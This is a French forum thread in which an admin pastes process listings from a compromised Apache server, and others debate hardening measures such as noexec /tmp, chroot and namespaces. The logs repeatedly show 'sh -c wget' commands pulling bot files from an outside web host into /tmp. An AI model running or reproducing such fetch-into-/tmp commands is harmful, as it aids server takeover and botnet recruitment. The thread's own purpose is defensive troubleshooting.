OVH Cloud OVH Cloud

Apache et wget

13 réponses
Avatar
Hugo
Bonjour,

J'ai un problème avec mon apache. Il y a des process qui démarre du style :

apache 22090 0.0 0.2 4156 1056 ? S 09:04 0:00 sh -c wget
http://maple.phpwebhosting.com/~darkbroked/linuxday.txt -O
apache 22091 0.0 0.3 5536 1572 ? S 09:04 0:00 wget
http://maple.phpwebhosting.com/~darkbroked/linuxday.txt -O /tmp/
apache 22099 0.0 0.2 4160 1064 ? S 09:04 0:00 sh -c wget
http://maple.phpwebhosting.com/~darkbroked/linuxdaybot.txt
apache 22100 0.0 0.3 5544 1580 ? S 09:04 0:00 wget
http://maple.phpwebhosting.com/~darkbroked/linuxdaybot.txt -O /t

C'est quoi je peux faire pour contrer ca svp?

Merci et bonne journée!!

Hugo

10 réponses

1 2
Avatar
[SauronDeMordor]
Bonjour,

J'ai un problème avec mon apache. Il y a des process qui démarre d u style :

apache 22090 0.0 0.2 4156 1056 ? S 09:04 0:00 sh -c wg et
http://maple.phpwebhosting.com/~darkbroked/linuxday.txt -O
apache 22091 0.0 0.3 5536 1572 ? S 09:04 0:00 wget
http://maple.phpwebhosting.com/~darkbroked/linuxday.txt -O /tmp/
apache 22099 0.0 0.2 4160 1064 ? S 09:04 0:00 sh -c wg et
http://maple.phpwebhosting.com/~darkbroked/linuxdaybot.txt
apache 22100 0.0 0.3 5544 1580 ? S 09:04 0:00 wget
http://maple.phpwebhosting.com/~darkbroked/linuxdaybot.txt -O /t

C'est quoi je peux faire pour contrer ca svp?

Merci et bonne journée!!

Hugo


vu ce que tu dit j espere que tu a monte /tmp et noexec et nosuid (option s dans /etc/fstab) car sinon ca crain pas mal

et tu rique de faire partis des jolies botnet :(

Avatar
Nicolas George
"[SauronDeMordor]" wrote in message <dm7igo$857j$:
vu ce que tu dit j espere que tu a monte /tmp et noexec


Quelle drôle d'idée. /tmp, c'est très bien pour compiler des trucs.

Avatar
[SauronDeMordor]
"[SauronDeMordor]" wrote in message <dm7igo$857j$:

vu ce que tu dit j espere que tu a monte /tmp et noexec



Quelle drôle d'idée. /tmp, c'est très bien pour compiler des truc s.
oui surtout si c est pas ta machine et que tu a utilisé une vulnérabi lité pour y aller.


cf une vulnerabilité de openssl/apache qui permétait d executer du co de arbitraire a partir de /tmp et qui etait suid.

tous les serveurs qui etaient en nosuid pas touchés (ou peut) et ceux e n no exec, rien du tout.

et pour compiler /tmp n est pas l idéal, pas fait pour cela.


Avatar
Nicolas George
"[SauronDeMordor]" wrote in message <dmentj$88k6$:
cf une vulnerabilité de openssl/apache qui permétait d executer du code
arbitraire a partir de /tmp et qui etait suid.


Eh bien, quand on a un serveur vulnérable, on l'upgrade.

et pour compiler /tmp n est pas l idéal, pas fait pour cela.


Je persiste, c'est très bien, en particulier la possibilité de faire tout le
boulot sans toucher aux disques.

PS : tu fais des lignes trop longues.

Avatar
[SauronDeMordor]
"[SauronDeMordor]" wrote in message <dmentj$88k6$:

cf une vulnerabilité de openssl/apache qui permétait d executer du code
arbitraire a partir de /tmp et qui etait suid.



Eh bien, quand on a un serveur vulnérable, on l'upgrade.



quand le patch est pas encore la, ou la vulnerailite pas dectectee tu te fais
avoir dans les grandes largeures.

de plus l upgrade n est pas forcement la reponse a un probleme de secu, c ar il
peut y avoir des contraindication ou des contraintes de producation sur u n
serveur qui empeche les upgrade.


une machine corectyement utilisee et installee et CONFIGUREE est toujours plus
sure qu une machine installee en Gruik, meme si cette derniere est a jour et pas
l autre


et pour compiler /tmp n est pas l idéal, pas fait pour cela.



Je persiste, c'est très bien, en particulier la possibilité de fair e tout le
boulot sans toucher aux disques.



tss, /tmp est un disque meme si tu le met en ram par tmpfs, tu n as qu a faire
un autre /Compile a la place.

PS : tu fais des lignes trop longues.


sorry, il y a quelques mois j avais fait une modif pour la taille des lig nes et
oublier de remetre a 80 collones(voila qui est fait)


Avatar
Nicolas George
"[SauronDeMordor]" wrote in message <dmfbrd$88pg$:
de plus l upgrade n est pas forcement la reponse a un probleme de secu,
car il peut y avoir des contraindication ou des contraintes de producation
sur un serveur qui empeche les upgrade.


Peut-être, quoi qu'il en soit, quand il y a un trou, il faut le boucher. Les
rustines du style noexec dans /tmp ne sont pas quelque chose de fiable.

tss, /tmp est un disque meme si tu le met en ram par tmpfs, tu n as qu a
faire un autre /Compile a la place.


Je ne vois pas l'intérêt de disperser les resources.

sorry, il y a quelques mois j avais fait une modif pour la taille des
lignes et oublier de remetre a 80 collones(voila qui est fait)


Il faut régler à moins, 76 ou 72, pour permettre les citations.

Avatar
[SauronDeMordor]
"[SauronDeMordor]" wrote in message <dmfbrd$88pg$:

de plus l upgrade n est pas forcement la reponse a un probleme de secu,
car il peut y avoir des contraindication ou des contraintes de producat ion
sur un serveur qui empeche les upgrade.



Peut-être, quoi qu'il en soit, quand il y a un trou, il faut le bouch er. Les
rustines du style noexec dans /tmp ne sont pas quelque chose de fiable.

quand il y a un trou et que le trou _ET_ que tu es sensible a celui ci. c ar si

pas impacte alors pas d upgrade, on upgrade pas pour le plaisir. car cela peut
introduire de nouveaux bug qui peuvent poser probleme



noexec n ets pas une rustine, mais bel et bien une recommendation

tss, /tmp est un disque meme si tu le met en ram par tmpfs, tu n as qu a
faire un autre /Compile a la place.



Je ne vois pas l'intérêt de disperser les resources.


sorry, il y a quelques mois j avais fait une modif pour la taille des
lignes et oublier de remetre a 80 collones(voila qui est fait)



Il faut régler à moins, 76 ou 72, pour permettre les citations.



Avatar
Nicolas George
"[SauronDeMordor]" wrote in message <dmfhm6$88qu$:
quand il y a un trou et que le trou _ET_ que tu es sensible a celui ci.
car si pas impacte alors pas d upgrade, on upgrade pas pour le plaisir.
car cela peut introduire de nouveaux bug qui peuvent poser probleme


Évidemment.

noexec n ets pas une rustine, mais bel et bien une recommendation


noexec sur /tmp, sur une machine généraliste et pas un serveur spécialisé,
c'est pénible, c'est tout. Si on veut isoler tel ou tel serveur, il y a
chroot ou les namespaces qui servent à ça.

Avatar
[SauronDeMordor]
"[SauronDeMordor]" wrote in message <dmfhm6$88qu$:

quand il y a un trou et que le trou _ET_ que tu es sensible a celui ci.
car si pas impacte alors pas d upgrade, on upgrade pas pour le plaisir.
car cela peut introduire de nouveaux bug qui peuvent poser probleme



Évidemment.


noexec n ets pas une rustine, mais bel et bien une recommendation



noexec sur /tmp, sur une machine généraliste et pas un serveur spé cialisé,
c'est pénible, c'est tout. Si on veut isoler tel ou tel serveur, il y a
chroot ou les namespaces qui servent à ça.

un chroot, il me faudrait 20 seconde pour m en echaper, je pense pas que ca soit

une securite. ca serais plus dur sur le file system ebergeant le chroot e tait en
nodev aussi.
quand aux namespaces??? tu veux parler des jail, ou des environement sous pax ou
grsecurity?

si tu veux avoir une config machine si complex qu elle devient ingerable alors
qu une solution simple suffit, grand bien t en fasse.


Avatar
Nicolas George
"[SauronDeMordor]" wrote in message <dmhj4p$89q8$:
un chroot, il me faudrait 20 seconde pour m en echaper,


Seulement si tu as déjà les droits de root.

ca serais plus dur sur le file system ebergeant le chroot
etait en nodev aussi.


Utiliser un chroot permet de mettre les attributs que tu veux aux
filesystems utilisés par le serveur sans faire chier les autres utilisateurs
de la machine.

quand aux namespaces??? tu veux parler des jail, ou des environement sous
pax ou grsecurity?


Non, je voulais parler de l'option CLONE_NEWNS de clone.

1 2